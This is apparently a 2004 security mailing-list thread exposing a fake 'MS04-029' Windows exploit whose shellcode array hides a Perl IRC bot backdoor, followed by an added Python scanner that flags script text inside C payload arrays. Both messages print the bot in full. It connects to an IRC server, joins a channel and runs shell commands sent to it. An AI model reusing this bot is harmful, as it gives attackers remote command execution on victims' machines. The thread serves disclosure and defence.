Message-ID: <418A13BC.9090202@inf.ufsc.br>
From: emilio at inf.ufsc.br (Emílio Wuerges)
Subject: New Remote Windows Exploit (MS04-029)
It was much easier to do:
$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print
$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan
:Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN
$chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]*
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG
$chan :$_\n";sleep 1;}}}#/tmp/hi
*** MaxLoad (windows rpc exploit) v.1 ***
For educational propose only!
error: you must enter a valid ip
usage:%s [IP-ADDRESS]
e.g: %s 192.168.1.23
error in ip address: sscanf
error: alignment could not be done
://[
Successfully send payload!
Try connect to %s port 31337
/tmp/hi
Tada!!
--
Emílio Wuerges
--
Ciências da Computação (cco021)
Universidade Federal de Santa Catarina
--
--
Once you've seen one nuclear war, you've seen them all.
--
Barrie Dempster wrote:
>Excellent exploit, I'm sure no one will spot that perl IRC bot in there,
>nope no one will see that...
>
>(hint for the readers, try looking at the ascii output of the "char
>*shellcode_payload=" data, looks a little like the following....)
>
>[code]
>#!/usr/bin/perl
>$c
>han="#0x";$nick="k
>";$server="ir3ip.n
>et";$SIG{TERM}={};
>exit if fork;use I
>O::Socket;$sock =
>IO::Socket::INET->
>new($server.":6667
>")||exit;print $so
>ck "USER k +i k :k
>v1\nNICK k\n";$i=1
>;while(<$sock>=~/^
>[^ ]+ ([^ ]+) /){$
>mode=$1;last if $m
>ode=="001";if($mod
>e=="433"){$i++;$ni
>ck=~s/\d*$/$i/;pri
>nt $sock "NICK $ni
>ck\n";}}print $soc
>k "JOIN $chan\nPRI
>VMSG $chan :Hi\n";
>while(<$sock>){if
>(/^PING (.*)$/){pr
>int $sock "PONG $1
>\nJOIN $chan\n";}i
>f(s/^[^ ]+ PRIVMSG
> $chan :$nick[^ :\
>w]*:[^ :\w]* (.*)$
>/$1/){s/\s*$//;$_=
>`$_`;foreach(split
> "\n"){print $sock
> "PRIVMSG $chan :$
>_\n";sleep 1;}}}#/
>tmp/hi
>
>[/code]
>
>--
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
> http://www.bsrf.org.uk
>
>[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
>
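The check both posters describe, recovering the ASCII that `strings` shows from the `char *shellcode_payload=` array and noticing the Perl bot in it, can be automated against the source before anything is compiled. The script below is an added example, not code from this thread or from either poster: it decodes the adjacent C string literals of each char-array definition, splits the result into printable runs the way `strings` does, and flags runs that contain a script shebang, a socket library, IRC protocol verbs or shell command substitution. The C source in `SAMPLE_SOURCE` is constructed to mirror the chunked layout shown in the quoted post (a NOP sled followed by script text split across literals) and is not the payload from the exploit; the indicator list is a starting point a reviewer would extend.

```python
"""Find script text hidden inside a C byte-array payload.

Added example, not code from the thread or its authors. Assumes the
payload is written as adjacent C string literals with two-digit \\x
escapes, the usual way shellcode is pasted into exploit sources.
"""
import re
from typing import Dict, List, Tuple

# Matches `char *name = "..." "..." ...;` and `unsigned char name[] = "...";`
_DECL = re.compile(
    r'(?:unsigned\s+)?char\s*\*?\s*(\w+)\s*(?:\[\s*\d*\s*\])?\s*=\s*'
    r'((?:\s*"(?:[^"\\]|\\.)*")+)\s*;',
    re.DOTALL,
)
_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
# One C escape or one raw character at a time (octal is tried before \\.)
_TOKEN = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)|(.)', re.DOTALL)
_SIMPLE = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11}


def decode_c_literal(body: str) -> bytes:
    """Turn the inside of one C string literal into the bytes it denotes."""
    out = bytearray()
    for m in _TOKEN.finditer(body):
        hexd, octd, esc, raw = m.groups()
        if hexd is not None:
            out.append(int(hexd, 16))
        elif octd is not None:
            out.append(int(octd, 8) & 0xFF)
        elif esc is not None:
            out.append(_SIMPLE.get(esc, ord(esc)))  # \\, \" and \' map to themselves
        else:
            out += raw.encode("latin-1", "replace")
    return bytes(out)


def payload_arrays(source: str) -> Dict[str, bytes]:
    """Concatenate the adjacent string literals of each char-array definition."""
    arrays = {}
    for decl in _DECL.finditer(source):
        name, literals = decl.group(1), decl.group(2)
        arrays[name] = b"".join(
            decode_c_literal(m.group(1)) for m in _LITERAL.finditer(literals)
        )
    return arrays


def printable_runs(data: bytes, min_len: int = 4) -> List[str]:
    """Rough equivalent of `strings`: runs of printable ASCII at least min_len long."""
    runs, cur = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F or b == 0x09:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        runs.append(cur.decode("ascii"))
    return runs


# Indicators that a "shellcode" array is really an interpreted script
INDICATORS = [
    ("script shebang", re.compile(r"#!\s*/\S+")),
    ("socket library", re.compile(r"IO::Socket|socket\.socket|\bsocket\s*\(")),
    ("IRC protocol verbs", re.compile(r"\b(?:NICK|JOIN|PRIVMSG|PONG)\b")),
    ("shell command substitution", re.compile(r"`[^`]+`")),
]


def scan_source(source: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map each payload array to the (indicator, matched text) pairs in its printable runs."""
    report = {}
    for name, data in payload_arrays(source).items():
        hits = []
        for run in printable_runs(data):
            for label, pat in INDICATORS:
                m = pat.search(run)
                if m:
                    hits.append((label, m.group(0)))
        report[name] = hits
    return report


# Constructed sample: a sled, then script text split across 18-byte literals
# the way the quoted post shows it. Not the payload from the exploit.
SAMPLE_SOURCE = r'''
char *shellcode_payload =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "#!/usr/bin/perl\n$"
    "server=\"irc.exam"
    "ple.invalid\";use I"
    "O::Socket;print $s"
    "ock \"NICK k\\nJOIN "
    "#0x\\n\";$_=`$_`;\n"
    "\x90\x90\x90";
unsigned char harmless[] = "\x31\xc0\x50\x68";
'''

if __name__ == "__main__":
    for name, hits in scan_source(SAMPLE_SOURCE).items():
        print(name, "->", hits or "no script indicators")
```

Run it over a downloaded exploit source before building it; any array that yields a shebang or protocol verbs deserves the same look Barrie gave this one. Real `\x` escapes in C consume every following hex digit, so the two-digit assumption only holds for the conventional shellcode layout.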